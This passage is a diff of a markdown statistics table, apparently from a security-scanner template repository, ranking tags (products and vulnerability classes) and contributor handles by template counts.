(@cristivlad25) | 2 | | | | | | | -| smb | 12 | hackerarpan | 2 | | | | | | | -| newrelic | 12 | danielmofer | 2 | | | | | | | -| drupal | 12 | wa1tf0rme | 2 | | | | | | | -| netsweeper | 12 | ree4pwn | 2 | | | | | | | -| storage | 12 | joeldeleep | 2 | | | | | | | -| jetbrains | 12 | luci | 2 | | | | | | | -| doppler | 12 | sascha brendel | 2 | | | | | | | -| phpgurukul | 12 | zomsop82 | 2 | | | | | | | -| glpi | 12 | mzack9999 | 2 | | | | | | | -| vbulletin | 12 | geekby | 2 | | | | | | | -| hikvision | 12 | n-thumann | 2 | | | | | | | -| webserver | 12 | moritz nentwig | 2 | | | | | | | -| fuzzing | 12 | h0j3n | 2 | | | | | | | -| zabbix | 11 | christianpoeschl | 2 | | | | | | | -| keyvault | 11 | bananabr | 2 | | | | | | | -| iam | 11 | c3l3si4n | 2 | | | | | | | -| thinkphp | 11 | thefoggiest | 2 | | | | | | | -| django | 11 | dbrwsky | 2 | | | | | | | -| prometheus | 11 | myztique | 2 | | | | | | | -| fastjson | 11 | israel comazzetto dos reis | 2 | | | | | | | -| phpmyadmin | 11 | github.com/its0x08 | 2 | | | | | | | -| xstream | 11 | ehsahil | 2 | | | | | | | -| iis | 11 | bl4ckp4r4d1s3 | 2 | | | | | | | -| osint-video | 11 | cckuakilong | 2 | | | | | | | -| blind | 11 | z0ne | 2 | | | | | | | -| jolokia | 11 | kiblyn11 | 2 | | | | | | | -| crlf | 11 | korteke | 2 | | | | | | | -| dahua | 10 | brenocss | 2 | | | | | | | -| fortios | 10 | 666asd | 2 | | | | | | | -| secret | 10 | 0xnirvana | 2 | | | | | | | -| python | 10 | alessandro albani - devisions | 2 | | | | | | | -| dropbox | 10 | x1m_martijn | 2 | | | | | | | -| sitecore | 10 | ep1csage | 2 | | | | | | | -| solarview | 10 | v0idc0de | 2 | | | | | | | -| samsung | 10 | 6mile | 2 | | | | | | | -| openai | 10 | thardt-praetorian | 2 | | | | | | | -| symfony | 10 | koti2 | 2 | | | | | | | -| f5 | 10 | notnotnotveg | 2 | | | | | | | -| elasticsearch | 10 | udit_thakkur | 2 | | | | | | | -| db | 10 | shelled | 2 | | | | | | | -| solr | 10 | ricardo maia (brainfork) | 2 | | | | | | | -| digitalocean | 10 | nkxxkn | 2 | | | | | | | -| xstream_project | 10 | uomogrande | 2 | | | | | | | -| mlflow | 9 | paperpen | 2 | | | | | | | -| druid | 9 | dahse89 | 2 | | | | | | | -| wso2 | 9 | parzival | 2 | | | | | | | -| cnvd2020 | 9 | joshua rogers | 2 | | | | | | | -| facebook | 9 | charles d. | 2 | | | | | | | -| gateway | 9 | bsysop | 2 | | | | | | | -| pfsense | 9 | 0xelkomy | 2 | | | | | | | -| vcenter | 9 | paradessia | 2 | | | | | | | -| solarwinds | 9 | d4vy | 2 | | | | | | | -| moodle | 9 | k11h-de | 2 | | | | | | | -| console | 9 | lotusdll | 2 | | | | | | | -| versa | 9 | vavkamil | 2 | | | | | | | -| opencats | 9 | afaq | 2 | | | | | | | -| joomla\! | 9 | topscoder | 2 | | | | | | | -| cloudtrail | 9 | amsda | 2 | | | | | | | -| elastic | 9 | kre80r | 2 | | | | | | | -| kube | 9 | brucelsone | 2 | | | | | | | -| servicenow | 9 | sinkettu | 2 | | | | | | | -| bitbucket | 9 | joshlarsen | 2 | | | | | | | -| scada | 9 | gal nagli | 2 | | | | | | | -| artica | 9 | bing0o | 2 | | | | | | | -| lucee | 9 | 0xrudra | 2 | | | | | | | -| exchange | 9 | sbani | 2 | | | | | | | -| firebase | 9 | bmcel | 2 | | | | | | | -| sangfor | 9 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| sophos | 9 | supr4s | 2 | | | | | | | -| gitea | 9 | 0xsmiley | 2 | | | | | | | -| hms | 8 | randomdhiraj | 2 | | | | | | | -| manager | 8 | pbuff07 | 2 | | | | | | | -| cacti | 8 | hetroublemakr | 2 | | | | | | | -| bloofox | 8 | msegoviag | 2 | | | | | | | -| atom | 8 | y4er | 2 | | | | | | | -| go | 8 | zy9ard3 | 2 | | | | | | | -| huawei | 8 | ayadim | 2 | | | | | | | -| osint-news | 8 | thezakman | 2 | | | | | | | -| sql | 8 | manas_harsh | 2 | | | | | | | -| bucket | 8 | serrapa | 2 | | | | | | | -| strapi | 8 | raesene | 2 | | | | | | | -| avtech | 8 | lstatro | 2 | | | | | | | -| lfprojects | 8 | gevakun | 2 | | | | | | | -| phpinfo | 8 | socketz | 2 | | | | | | | -| ldap | 8 | danmcinerney | 2 | | | | | | | -| unauthenticated | 8 | rafaelwdornelas | 2 | | | | | | | -| nagiosxi | 8 | kishore-hariram | 2 | | | | | | | -| e-office | 8 | pxmme1337 | 2 | | | | | | | -| default-page | 8 | ajaysenr | 2 | | | | | | | -| spotweb_project | 8 | 0xcrypto | 2 | | | | | | | -| odoo | 8 | foulenzer | 2 | | | | | | | -| spotweb | 8 | shankaracharya | 2 | | | | | | | -| vmss | 8 | herry | 2 | | | | | | | -| mirai | 8 | sinsinology | 2 | | | | | | | -| cloud-enum | 8 | mrharshvardhan | 2 | | | | | | | -| ognl | 8 | dheerajmadhukar | 2 | | | | | | | -| phpjabbers | 8 | sy3omda | 2 | | | | | | | -| config-audit | 8 | davidegirardi | 2 | | | | | | | -| landray | 8 | ritesh_gohil(#l4stpl4y3r) | 2 | | | | | | | -| emerge | 8 | redteambrasil | 2 | | | | | | | -| security | 8 | martincodes-de | 2 | | | | | | | -| microfocus | 8 | clarkvoss | 2 | | | | | | | -| oauth | 8 | cocxanh | 2 | | | | | | | -| recon | 8 | g4l1t0 | 2 | | | | | | | -| symantec | 8 | maximus decimus | 2 | | | | | | | -| wanhu | 8 | t3l3machus | 2 | | | | | | | -| aks | 8 | thevillagehacker | 2 | | | | | | | -| nexus | 8 | bp0lr | 2 | | | | | | | -| discord | 8 | dogancanbakir | 2 | | | | | | | -| nacos | 8 | florianmaak | 2 | | | | | | | -| openemr | 8 | technicaljunkie | 1 | | | | | | | -| azure-storage | 8 | izn0u | 1 | | | | | | | -| cisco-switch | 8 | zinminphy0 | 1 | | | | | | | -| metadata | 8 | booboohq | 1 | | | | | | | -| bigip | 8 | sorrowx3 | 1 | | | | | | | -| shopify | 7 | kareemse1im | 1 | | | | | | | -| rfi | 7 | 0xparth | 1 | | | | | | | -| virtual-machines | 7 | 0xelkomy & c0nqr0r | 1 | | | | | | | -| mobileiron | 7 | pastaga | 1 | | | | | | | -| pmb | 7 | paper-pen | 1 | | | | | | | -| websphere | 7 | alexrydzak | 1 | | | | | | | -| rat | 7 | rschio | 1 | | | | | | | -| mongodb | 7 | pepitoh | 1 | | | | | | | -| teamcity | 7 | pascalheidmann | 1 | | | | | | | -| maps | 7 | smaranchand | 1 | | | | | | | -| exploitdb | 7 | ilovebinbash | 1 | | | | | | | -| telesquare | 7 | co0nan | 1 | | | | | | | -| splunk | 7 | godfatherorwa | 1 | | | | | | | -| car_rental_management_system_project | 7 | wabafet | 1 | | | | | | | -| monstra | 7 | ynnirc | 1 | | | | | | | -| linkedin | 7 | borna nematzadeh | 1 | | | | | | | -| cnvd2023 | 7 | iampritam | 1 | | | | | | | -| nortekcontrol | 7 | zandros0 | 1 | | | | | | | -| pods | 7 | elitebaz | 1 | | | | | | | -| gogs | 7 | natto97 | 1 | | | | | | | -| ruckus | 7 | jfbes | 1 | | | | | | | -| oos | 7 | b0rn2r00t | 1 | | | | | | | -| fpd | 7 | f0xy | 1 | | | | | | | -| slack | 7 | affix | 1 | | | | | | | -| geoserver | 7 | houdinis | 1 | | | | | | | -| error | 7 | phyr3wall | 1 | | | | | | | -| opensis | 7 | ndmalc | 1 | | | | | | | -| keycloak | 7 | couskito | 1 | | | | | | | -| gradio | 7 | kaizensecurity | 1 | | | | | | | -| leak | 7 | chron0x | 1 | | | | | | | -| blockchain | 7 | yhy0 | 1 | | | | | | | -| vpc | 7 | bibeksapkota (sar00n) | 1 | | | | | | | -| twitter | 7 | d0rkerdevil | 1 | | | | | | | -| vms | 7 | s1r1u5_ | 1 | | | | | | | -| vrealize | 7 | akshansh | 1 | | | | | | | -| contec | 7 | kailashbohara | 1 | | | | | | | -| database | 7 | schniggie | 1 | | | | | | | -| squirrelmail | 7 | shivampand3y | 1 | | | | | | | -| jeecg | 7 | knassar702 | 1 | | | | | | | -| couchdb | 7 | pjborah | 1 | | | | | | | -| nextjs | 7 | unp4ck | 1 | | | | | | | -| keking | 7 | thebinitghimire | 1 | | | | | | | -| filemanager | 7 | exploitation | 1 | | | | | | | -| moodating | 7 | deena | 1 | | | | | | | -| activemq | 7 | jcockhren | 1 | | | | | | | -| openvpn | 6 | b0yd | 1 | | | | | | | -| typo3 | 6 | ledoubletake | 1 | | | | | | | -| liferay | 6 | adrianmf | 1 | | | | | | | -| asp | 6 | jonathanwalker | 1 | | | | | | | -| craftcms | 6 | luqmaan hadia | 1 | | | | | | | -| | | [luqiih](https://github.com/luqiih) | | | | | | | | -| microstrategy | 6 | mayank_pandey01 | 1 | | | | | | | -| api-management | 6 | babybash | 1 | | | | | | | -| gcp | 6 | ahmetpergamum | 1 | | | | | | | -| webmin | 6 | dk999 | 1 | | | | | | | -| cve2007 | 6 | p-l- | 1 | | | | | | | -| functionapp | 6 | vzamanillo | 1 | | | | | | | -| server | 6 | philippdelteil | 1 | | | | | | | -| sonarqube | 6 | h4kux | 1 | | | | | | | -| froxlor | 6 | noel | 1 | | | | | | | -| paloaltonetworks | 6 | _harleo | 1 | | | | | | | -| online-fire-reporting | 6 | andysvints | 1 | | | | | | | -| zhiyuan | 6 | yiran | 1 | | | | | | | -| flutterwave | 6 | professorabhay | 1 | | | | | | | -| online_fire_reporting_system_project | 6 | watchtowr | 1 | | | | | | | -| doctor-appointment-system | 6 | akash.c | 1 | | | | | | | -| virtual-machine | 6 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| asus | 6 | lingtren | 1 | | | | | | | -| magmi | 6 | sumanth vankineni | 1 | | | | | | | -| elfinder | 6 | amanrawat | 1 | | | | | | | -| paypal | 6 | guax1 | 1 | | | | | | | -| chanjet | 6 | caon | 1 | | | | | | | -| advantech | 6 | alpernae | 1 | | | | | | | -| log | 6 | matt miller | 1 | | | | | | | -| tikiwiki | 6 | aravind | 1 | | | | | | | -| 74cms | 6 | secthebit | 1 | | | | | | | -| bmc | 6 | push4d | 1 | | | | | | | -| akamai | 6 | 0ut0fb4nd | 1 | | | | | | | -| cockpit | 6 | j3ssie/geraldino2 | 1 | | | | | | | -| learnpress | 6 | piyushchhiroliya | 1 | | | | | | | -| cobbler | 6 | dmartyn | 1 | | | | | | | -| chamilo | 6 | gboddin | 1 | | | | | | | -| avideo | 6 | amnotacat | 1 | | | | | | | -| plesk | 6 | rotembar | 1 | | | | | | | -| totolink | 6 | win3zz | 1 | | | | | | | -| jamf | 6 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| synacor | 6 | josecosta | 1 | | | | | | | -| dom | 6 | makyotox | 1 | | | | | | | -| pyload | 6 | vince-isec | 1 | | | | | | | -| h3c | 6 | ratnadip gajbhiye | 1 | | | | | | | -| jwt | 6 | gonski | 1 | | | | | | | -| minio | 6 | aresx | 1 | | | | | | | -| doctor_appointment_system_project | 6 | metascan | 1 | | | | | | | -| jetty | 6 | duty_1g | 1 | | | | | | | -| mikrotik | 6 | mubassirpatel | 1 | | | | | | | -| kubelet | 6 | adamparsons | 1 | | | | | | | -| beyondtrust | 6 | luqmaan hadia | 1 | | | | | | | -| spip | 6 | oscarintherocks | 1 | | | | | | | -| express | 6 | micha3lb3n | 1 | | | | | | | -| genetechsolutions | 5 | d4ly | 1 | | | | | | | -| esafenet | 5 | carson chan | 1 | | | | | | | -| crushftp | 5 | christbowel | 1 | | | | | | | -| apisix | 5 | evan rubinstien | 1 | | | | | | | -| wpdevart | 5 | xeldax | 1 | | | | | | | -| hpe | 5 | notwhy | 1 | | | | | | | -| spark | 5 | arr0way | 1 | | | | | | | -| metinfo | 5 | sec_hawk | 1 | | | | | | | -| zzzcms | 5 | dale clarke | 1 | | | | | | | -| adminer | 5 | noah @thesubtlety | 1 | | | | | | | -| papercut | 5 | team syslifters / christoph | 1 | | | | | | | -| | | mahrl | | | | | | | | -| terramaster | 5 | drfabiocastro | 1 | | | | | | | -| mantisbt | 5 | chesterblue | 1 | | | | | | | -| etcd | 5 | th3.d1p4k | 1 | | | | | | | -| react | 5 | mchklt | 1 | | | | | | | -| matrix | 5 | colbyjack1134 | 1 | | | | | | | -| circontrol | 5 | flag007 | 1 | | | | | | | -| eyoucms | 5 | stux | 1 | | | | | | | -| sentry | 5 | hakimkt | 1 | | | | | | | -| redmine | 5 | luqman | 1 | | | | | | | -| hybris | 5 | 1nf1n7y | 1 | | | | | | | -| gocd | 5 | undefl0w | 1 | | | | | | | -| carrental | 5 | cbadke | 1 | | | | | | | -| kkfileview | 5 | dabla | 1 | | | | | | | -| ethereum | 5 | non-things | 1 | | | | | | | -| caucho | 5 | abut0n | 1 | | | | | | | -| wbce | 5 | miroslavsotak | 1 | | | | | | | -| gnu | 5 | exceed | 1 | | | | | | | -| circarlife | 5 | realexp3rt | 1 | | | | | | | -| percha | 5 | thelicato | 1 | | | | | | | -| avaya | 5 | hczdmr | 1 | | | | | | | -| piwigo | 5 | mr.bobo hp | 1 | | | | | | | -| schneider-electric | 5 | petruknisme | 1 | | | | | | | -| webkul | 5 | nan-kl | 1 | | | | | | | -| jellyfin | 5 | clment cruchet | 1 | | | | | | | -| cdata | 5 | hardik-rathod | 1 | | | | | | | -| awstats | 5 | stupidfish | 1 | | | | | | | -| tenda | 5 | infosecsanyam | 1 | | | | | | | -| xmlrpc | 5 | 0xceeb | 1 | | | | | | | -| httpd | 5 | opencirt | 1 | | | | | | | -| checkpoint | 5 | kishore krishna (sillydaddy) | 1 | | | | | | | -| resin | 5 | pry0cc | 1 | | | | | | | -| elementor | 5 | nuts7 | 1 | | | | | | | -| fit2cloud | 5 | ringo | 1 | | | | | | | -| 10web | 5 | abdullahisik | 1 | | | | | | | -| sysaid | 5 | west-wise | 1 | | | | | | | -| sftp | 5 | vulnspace | 1 | | | | | | | -| openfire | 5 | jiheon-dev | 1 | | | | | | | -| hoteldruid | 5 | mrcl0wnlab | 1 | | | | | | | -| vehicle_service_management_system_project | 5 | mabdullah22 | 1 | | | | | | | -| web3 | 5 | tirtha_mandal | 1 | | | | | | | -| dionaea | 5 | breakpack | 1 | | | | | | | -| glpi-project | 5 | furkansayim | 1 | | | | | | | -| adb | 5 | bleron rrustemi | 1 | | | | | | | -| password | 5 | marcio mendes | 1 | | | | | | | -| digitaldruid | 5 | ramkrishna sawant | 1 | | | | | | | -| api-server | 5 | esonhugh | 1 | | | | | | | -| graylog | 5 | numan tĂŒrle | 1 | | | | | | | -| http | 5 | hateshape | 1 | | | | | | | -| voip | 5 | harryha | 1 | | | | | | | -| agentejo | 5 | kiransau | 1 | | | | | | | -| asana | 5 | chetgan | 1 | | | | | | | -| webview | 5 | null_hypothesis | 1 | | | | | | | -| acm | 5 | yashvardhantripathi | 1 | | | | | | | -| jabber | 5 | lethargynavigator | 1 | | | | | | | -| cloudflare | 5 | tea | 1 | | | | | | | -| qdpm | 5 | w0tx | 1 | | | | | | | -| axigen | 5 | jeya.seelan | 1 | | | | | | | -| fatpipe | 5 | blckraven | 1 | | | | | | | -| decision-center | 5 | dorkerdevil | 1 | | | | | | | -| magmi_project | 5 | qotoz | 1 | | | | | | | -| ems | 5 | anon-artist | 1 | | | | | | | -| blackenergy | 5 | erethon | 1 | | | | | | | -| nuuo | 5 | danigoland | 1 | | | | | | | -| qnap | 5 | sechunt3r | 1 | | | | | | | -| chatgpt | 5 | kiks7 | 1 | | | | | | | -| thedigitalcraft | 5 | zeroc00i | 1 | | | | | | | -| open-emr | 5 | gmeghab | 1 | | | | | | | -| telerik | 5 | 0h1in9e | 1 | | | | | | | -| openstack | 5 | harksu | 1 | | | | | | | -| parallels | 5 | ptonewreckin | 1 | | | | | | | -| connectwise | 5 | unblvr1 | 1 | | | | | | | -| apollo | 5 | jc175 | 1 | | | | | | | -| dolibarr | 5 | vikas kundu | 1 | | | | | | | -| square | 5 | nobody | 1 | | | | | | | -| swagger | 5 | napgh0st | 1 | | | | | | | -| goanywhere | 5 | omarjezi | 1 | | | | | | | -| jupyter | 5 | mihail8531 | 1 | | | | | | | -| rseenet | 5 | kchason | 1 | | | | | | | -| tibco | 5 | zeyad azima | 1 | | | | | | | -| mssql | 5 | dwbzn | 1 | | | | | | | -| firmware | 5 | hĂŒseyin tintaƟ | 1 | | | | | | | -| thimpress | 4 | sim4110 | 1 | | | | | | | -| pixie | 4 | b4uh0lz | 1 | | | | | | | -| sql-database | 4 | pudsec | 1 | | | | | | | -| eclipse | 4 | johndoeanonita | 1 | | | | | | | -| account-takeover | 4 | jrolf | 1 | | | | | | | -| pmb_project | 4 | ryanborum | 1 | | | | | | | -| heroku | 4 | jteles | 1 | | | | | | | -| metersphere | 4 | jadu101 | 1 | | | | | | | -| djangoproject | 4 | aringo-bf | 1 | | | | | | | -| linuxfoundation | 4 | toufik-airane | 1 | | | | | | | -| newstatpress | 4 | xiaowangsec | 1 | | | | | | | -| ebs | 4 | jaimin gondaliya | 1 | | | | | | | -| webshell | 4 | juicypotato1 | 1 | | | | | | | -| jsf | 4 | pphuahua | 1 | | | | | | | -| datadog | 4 | gpiechnik2 | 1 | | | | | | | -| aura | 4 | ok_bye_now | 1 | | | | | | | -| rubyonrails | 4 | th3r4id | 1 | | | | | | | -| cnvd2022 | 4 | floriandewald | 1 | | | | | | | -| pentaho | 4 | higor melgaço (eremit4) | 1 | | | | | | | -| audiocodes | 4 | carrot2 | 1 | | | | | | | -| sendgrid | 4 | ahmed abou-ela | 1 | | | | | | | -| bittrex | 4 | youngpope | 1 | | | | | | | -| age-encryption | 4 | mayankpandey01 | 1 | | | | | | | -| projectsend | 4 | william söderberg @ withsecure | 1 | | | | | | | -| okta | 4 | pwnwithlove | 1 | | | | | | | -| supsystic | 4 | ayadi | 1 | | | | | | | -| finicity | 4 | prettyboyaaditya | 1 | | | | | | | -| linkerd | 4 | yashanand155 | 1 | | | | | | | -| webmail | 4 | puben | 1 | | | | | | | -| ternaria | 4 | anonymous | 1 | | | | | | | -| auieo | 4 | andirrahmani1 | 1 | | | | | | | -| superwebmailer | 4 | thirukrishnan | 1 | | | | | | | -| hongfan | 4 | nechyo | 1 | | | | | | | -| cookie | 4 | barttran2000 | 1 | | | | | | | -| newstatpress_project | 4 | drewvravick | 1 | | | | | | | -| search | 4 | petergrifin | 1 | | | | | | | -| umbraco | 4 | 0xtavian | 1 | | | | | | | -| pega | 4 | wlayzz | 1 | | | | | | | -| salesforce | 4 | none | 1 | | | | | | | -| wcs | 4 | 0xh7ml | 1 | | | | | | | -| puppet | 4 | ola456 | 1 | | | | | | | -| churchcrm | 4 | bernardo rodrigues | 1 | | | | | | | +| osint-health | 14 | aringo | 3 | | | | | | | +| login-check | 14 | ekrause | 3 | | | | | | | +| npm | 14 | fyoorer | 3 | | | | | | | +| icewarp | 14 | thomas_from_offensity | 3 | | | | | | | +| smtp | 14 | davidmckennirey | 3 | | | | | | | +| abstractapi | 13 | arcc | 3 | | | | | | | +| zimbra | 13 | johnjhacking | 3 | | | | | | | +| osint-dating | 13 | mavericknerd | 3 | | | | | | | +| laravel | 13 | canberbamber | 3 | | | | | | | +| drupal | 13 | e1a | 3 | | | | | | | +| cuppacms | 13 | imjust0 | 3 | | | | | | | +| rails | 13 | codexlynx | 2 | | | | | | | +| graphql | 13 | geekby | 2 | | | | | | | +| kafka | 13 | koti2 | 2 | | | | | | | +| sonicwall | 13 | 0xcrypto | 2 | | | | | | | +| auth | 13 | 6mile | 2 | | | | | | | +| osint-political | 13 | k11h-de | 2 | | | | | | | +| hashicorp | 13 | sy3omda | 2 | | | | | | | +| spring | 13 | dogancanbakir | 2 | | | | | | | +| airflow | 13 | stvnhrlnd | 2 | | | | | | | +| instrusive | 13 | lstatro | 2 | | | | | | | +| fortigate | 13 | brenocss | 2 | | | | | | | +| cuppa | 13 | cckuakilong | 2 | | | | | | | +| cache | 13 | moritz nentwig | 2 | | | | | | | +| progress | 12 | israel comazzetto dos reis | 2 | | | | | | | +| appservice | 12 | s4eio | 2 | | | | | | | +| smb | 12 | ehsahil | 2 | | | | | | | +| iis | 12 | hetroublemakr | 2 | | | | | | | +| hikvision | 12 | bsysop | 2 | | | | | | | +| vbulletin | 12 | sbani | 2 | | | | | | | +| dedecms | 12 | 0xrudra | 2 | | | | | | | +| netsweeper | 12 | 0xsmiley | 2 | | | | | | | +| webserver | 12 | udit_thakkur | 2 | | | | | | | +| doppler | 12 | danmcinerney | 2 | | | | | | | +| newrelic | 12 | g4l1t0 | 2 | | | | | | | +| jetbrains | 12 | hackerarpan | 2 | | | | | | | +| glpi | 12 | thevillagehacker | 2 | | | | | | | +| storage | 12 | sinkettu | 2 | | | | | | | +| phpgurukul | 12 | zy9ard3 | 2 | | | | | | | +| fuzzing | 12 | ree4pwn | 2 | | | | | | | +| deployments | 12 | manas_harsh | 2 | | | | | | | +| keyvault | 11 | kre80r | 2 | | | | | | | +| thinkphp | 11 | nuk3s3c | 2 | | | | | | | +| crlf | 11 | gal nagli | 2 | | | | | | | +| jolokia | 11 | t3l3machus | 2 | | | | | | | +| osint-video | 11 | thefoggiest | 2 | | | | | | | +| python | 11 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| django | 11 | foulenzer | 2 | | | | | | | +| phpmyadmin | 11 | 8arthur | 2 | | | | | | | +| fastjson | 11 | thezakman | 2 | | | | | | | +| prometheus | 11 | supr4s | 2 | | | | | | | +| blind | 11 | joshua rogers | 2 | | | | | | | +| iam | 11 | d4vy | 2 | | | | | | | +| zabbix | 11 | sascha brendel | 2 | | | | | | | +| xstream | 11 | ricardo maia (brainfork) | 2 | | | | | | | +| db | 10 | cheoljun99 | 2 | | | | | | | +| elasticsearch | 10 | ayadim | 2 | | | | | | | +| console | 10 | github.com/its0x08 | 2 | | | | | | | +| samsung | 10 | bananabr | 2 | | | | | | | +| symfony | 10 | cocxanh | 2 | | | | | | | +| sitecore | 10 | nkxxkn | 2 | | | | | | | +| openai | 10 | bl4ckp4r4d1s3 | 2 | | | | | | | +| dahua | 10 | 0xsapra | 2 | | | | | | | +| fortios | 10 | sim4110 | 2 | | | | | | | +| digitalocean | 10 | z0ne | 2 | | | | | | | +| solarview | 10 | 0xelkomy | 2 | | | | | | | +| xstream_project | 10 | koyejune0302 | 2 | | | | | | | +| dropbox | 10 | luci | 2 | | | | | | | +| solr | 10 | lotusdll | 2 | | | | | | | +| secret | 10 | vavkamil | 2 | | | | | | | +| f5 | 10 | rafaelwdornelas | 2 | | | | | | | +| sangfor | 9 | paradessia | 2 | | | | | | | +| moodle | 9 | afaq | 2 | | | | | | | +| opencats | 9 | kishore-hariram | 2 | | | | | | | +| odoo | 9 | florianmaak | 2 | | | | | | | +| bitbucket | 9 | ritesh_gohil(#l4stpl4y3r) | 2 | | | | | | | +| solarwinds | 9 | n-thumann | 2 | | | | | | | +| joomla\! | 9 | randomdhiraj | 2 | | | | | | | +| artica | 9 | socketz | 2 | | | | | | | +| gateway | 9 | dbrwsky | 2 | | | | | | | +| sophos | 9 | christianpoeschl | 2 | | | | | | | +| facebook | 9 | notnotnotveg | 2 | | | | | | | +| pfsense | 9 | raesene | 2 | | | | | | | +| cloudtrail | 9 | mys7ic | 2 | | | | | | | +| exchange | 9 | paperpen | 2 | | | | | | | +| vcenter | 9 | topscoder | 2 | | | | | | | +| gitea | 9 | pbuff07 | 2 | | | | | | | +| scada | 9 | ajaysenr | 2 | | | | | | | +| versa | 9 | thardt-praetorian | 2 | | | | | | | +| kube | 9 | v0idc0de | 2 | | | | | | | +| firebase | 9 | convisoappsec | 2 | | | | | | | +| cnvd2020 | 9 | supras | 2 | | | | | | | +| mlflow | 9 | c3l3si4n | 2 | | | | | | | +| elastic | 9 | x1m_martijn | 2 | | | | | | | +| druid | 9 | joshlarsen | 2 | | | | | | | +| wso2 | 9 | clarkvoss | 2 | | | | | | | +| lucee | 9 | shelled | 2 | | | | | | | +| gradio | 9 | mrharshvardhan | 2 | | | | | | | +| servicenow | 9 | shankaracharya | 2 | | | | | | | +| nexus | 8 | dheerajmadhukar | 2 | | | | | | | +| hms | 8 | charles d. | 2 | | | | | | | +| cloud-enum | 8 | danielmofer | 2 | | | | | | | +| unauthenticated | 8 | msegoviag | 2 | | | | | | | +| azure-storage | 8 | redteambrasil | 2 | | | | | | | +| landray | 8 | gevakun | 2 | | | | | | | +| cacti | 8 | w4cky_ | 2 | | | | | | | +| emerge | 8 | liwermor | 2 | | | | | | | +| osint-news | 8 | y4er | 2 | | | | | | | +| oauth | 8 | kiblyn11 | 2 | | | | | | | +| security | 8 | alessandro albani - devisions | 2 | | | | | | | +| mobileiron | 8 | 666asd | 2 | | | | | | | +| ldap | 8 | amsda | 2 | | | | | | | +| bloofox | 8 | h0j3n | 2 | | | | | | | +| recon | 8 | bing0o | 2 | | | | | | | +| phpinfo | 8 | uomogrande | 2 | | | | | | | +| phpjabbers | 8 | joeldeleep | 2 | | | | | | | +| nacos | 8 | 0xnirvana | 2 | | | | | | | +| sql | 8 | brucelsone | 2 | | | | | | | +| wanhu | 8 | ep1csage | 2 | | | | | | | +| nagiosxi | 8 | davidegirardi | 2 | | | | | | | +| atom | 8 | herry | 2 | | | | | | | +| manager | 8 | sinsinology | 2 | | | | | | | +| ognl | 8 | maximus decimus | 2 | | | | | | | +| lfprojects | 8 | bmcel | 2 | | | | | | | +| microfocus | 8 | korteke | 2 | | | | | | | +| strapi | 8 | wa1tf0rme | 2 | | | | | | | +| go | 8 | myztique | 2 | | | | | | | +| symantec | 8 | usdag | 2 | | | | | | | +| mirai | 8 | streetofhackerr007 | 2 | | | | | | | +| vmss | 8 | serrapa | 2 | | | | | | | +| config-audit | 8 | mzack9999 | 2 | | | | | | | +| mongodb | 8 | pxmme1337 | 2 | | | | | | | +| discord | 8 | zomsop82 | 2 | | | | | | | +| huawei | 8 | dahse89 | 2 | | | | | | | +| bucket | 8 | egemenkochisarli | 2 | | | | | | | +| metadata | 8 | michal mikolas (nanuqcz) | 2 | | | | | | | +| openemr | 8 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| avtech | 8 | bp0lr | 2 | | | | | | | +| default-page | 8 | amirmsafari | 2 | | | | | | | +| cisco-switch | 8 | martincodes-de | 2 | | | | | | | +| e-office | 8 | parzival | 2 | | | | | | | +| aks | 8 | invisiblethreat | 1 | | | | | | | +| spotweb_project | 8 | aayush vishnoi | 1 | | | | | | | +| spotweb | 8 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | | | | | | | | -| esri | 4 | wpsec | 1 | | | | | | | -| zte | 4 | igibanez | 1 | | | | | | | -| sound4 | 4 | viondexd | 1 | | | | | | | -| mooveagency | 4 | ph33rr | 1 | | | | | | | -| proftpd | 4 | adilsoybali | 1 | | | | | | | -| kibana | 4 | irshadahamed | 1 | | | | | | | -| mailchimp | 4 | diablo | 1 | | | | | | | -| temenos | 4 | barthy.koeln | 1 | | | | | | | -| artifactory | 4 | amirmsafari | 1 | | | | | | | -| cnvd2019 | 4 | droberson | 1 | | | | | | | -| shiro | 4 | exid | 1 | | | | | | | -| ad | 4 | staticnoise | 1 | | | | | | | -| bamboo | 4 | jacalynli | 1 | | | | | | | -| stripe | 4 | fq_hsu | 1 | | | | | | | -| metasploit | 4 | apt-mirror | 1 | | | | | | | -| reprisesoftware | 4 | olewagner | 1 | | | | | | | -| wireguard | 4 | hanlaomo | 1 | | | | | | | -| roxy | 4 | udinchan | 1 | | | | | | | -| monitor | 4 | mohammedsaneem | 1 | | | | | | | -| photo | 4 | geraldino2 | 1 | | | | | | | -| royalevent | 4 | 2rs3c | 1 | | | | | | | -| confluent | 4 | rubina119 | 1 | | | | | | | -| aspose | 4 | skylark-lab | 1 | | | | | | | -| hongdian | 4 | kurohost | 1 | | | | | | | -| casaos | 4 | ipanda | 1 | | | | | | | -| terra-master | 4 | _darrenmartyn | 1 | | | | | | | -| harmistechnology | 4 | xc1ym | 1 | | | | | | | -| codeigniter | 4 | tim_koopmans | 1 | | | | | | | -| arcgis | 4 | hazana | 1 | | | | | | | -| yeswiki | 4 | carlosvieira | 1 | | | | | | | -| bitrix | 4 | alevsk | 1 | | | | | | | -| flink | 4 | intx0x80 | 1 | | | | | | | -| thinkcmf | 4 | sicksec | 1 | | | | | | | -| d-link | 4 | 0xprial | 1 | | | | | | | -| aria | 4 | lady_bug | 1 | | | | | | | -| ransomware | 4 | ooooooo_q | 1 | | | | | | | -| easypost | 4 | shelld3v | 1 | | | | | | | -| rocketchat | 4 | sickwell | 1 | | | | | | | -| sigb | 4 | sttlr | 1 | | | | | | | -| veronalabs | 4 | juliosmelo | 1 | | | | | | | -| dotnet | 4 | joaonevess | 1 | | | | | | | -| env | 4 | 0xrod | 1 | | | | | | | -| info | 4 | aaronchen0 | 1 | | | | | | | -| seagate | 4 | mukundbhuva | 1 | | | | | | | -| jorani | 4 | fmunozs | 1 | | | | | | | -| imgproxy | 4 | retr02332 | 1 | | | | | | | -| openam | 4 | erikowen | 1 | | | | | | | -| containers | 4 | dhiyanesdk | 1 | | | | | | | -| pluginus | 4 | jeya seelan | 1 | | | | | | | -| powerjob | 4 | nytr0gen | 1 | | | | | | | -| kevinlab | 4 | olfloralo | 1 | | | | | | | -| panabit | 4 | aron molnar | 1 | | | | | | | -| myeventon | 4 | encodedguy | 1 | | | | | | | -| tiki | 4 | sshell | 1 | | | | | | | -| flatpress | 4 | alex | 1 | | 